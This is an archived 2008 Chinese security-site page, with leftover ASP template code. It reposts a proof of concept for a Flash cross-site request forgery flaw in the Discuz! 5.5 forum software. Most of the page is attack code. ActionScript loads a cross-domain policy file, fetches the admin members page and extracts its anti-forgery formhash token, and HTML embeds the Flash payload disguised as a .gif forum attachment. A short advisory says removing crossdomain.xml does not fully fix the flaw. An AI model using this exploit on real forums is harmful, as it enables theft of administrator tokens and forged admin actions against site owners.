<% dim ModuleName,InfoID,ChannelShortName,CorrelativeArticle,InstallDir,ChannelDir,Keyword,PageTitle,ArticleIntro,Articlecontent Keyword=stripHTML("调用,上传") PageTitle=stripHTML("Discuz! flash csrf vul") ArticleIntro=stripHTML("77169.com小编引言:Discuz! flash csrf vul,漏洞的主要原因: Discuz!漏洞") Articlecontent=stripHTML("POC[测试Discuz!5.5 其他版本的请自己编写]如下:

flash的原文件:http://www.80vul.com/dzvul/sodb/01/so…") ModuleName = stripHTML("exploits") InfoID = stripHTML("145316") ChannelShortName=stripHTML("漏洞") InstallDir=stripHTML("http://www.77169.com/") ChannelDir=stripHTML("exploits") %> Discuz! flash csrf vul - 华盟网 - http://www.77169.com
您现在的位置: 华盟网 >> 漏洞 >> web apps >> 正文

Discuz! flash csrf vul

2008/11/2 作者:不祥 来源: 互联网
导读 <% if len(ArticleIntro)<3 then Response.Write Articlecontent 'Response.Write "Articlecontent" else Response.Write ArticleIntro 'Response.Write "ArticleIntro" end if %>

POC[测试Discuz!5.5 其他版本的请自己编写]如下:

flash的原文件:http://www.80vul.com/dzvul/sodb/01/sodb-2008-02.fla

as代码如下:

import RegExp;
System.security.loadPolicyFile(http://www.80vul.com/bbs/crossdomain.xml);


var xml:XML = new XML();
xml.onData = function(s) {
tb1.text = getFirstMatch(new RegExp(<input type=\hidden\ name=\formhash\ value=\(\\w+)\ />, ig), s, 1);
}
System.security.loadPolicyFile(http://www.80vul.com/bbs/crossdomain.xml);
xml.load(http://www.80vul.com/bbs/admincp.php?action=members);

function getFirstMatch(re, s, i) {
var m = null;
if ((m = re.exec(s)) != null) {
return m[i];
}
}



远程调用的html:

<object classid=clsid:d27cdb6e-ae6d-11cf-96b8-444553540000 codebase=http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,0,0 width=550 height=400><param name=allowScriptAccess value=sameDomain><param name=movie value=http://www.80vul.com/bbs/attachments/month_0810/20081030_a293d131d2da23ead5805QYWvs5tkBpi.gif><param name=quality value=high><param name=bgcolor value=#ffffff><embed src=http://www.80vul.com/bbs/attachments/month_0810/20081030_a293d131d2da23ead5805QYWvs5tkBpi.gif quality=high bgcolor=#ffffff allowscriptaccess=sameDomain type=application/x-shockwave-flash pluginspage=http://www.macromedia.com/go/getflashplayer width=550 height=400></object>

77169.com安全建议: [删除crossdomain.xml不可以完全修补该漏洞,crossdomain.xml可以为容易文件名loadPolicyFile()调用就行,所以攻击者可以通过上传等上传改名了的crossdomain.xml]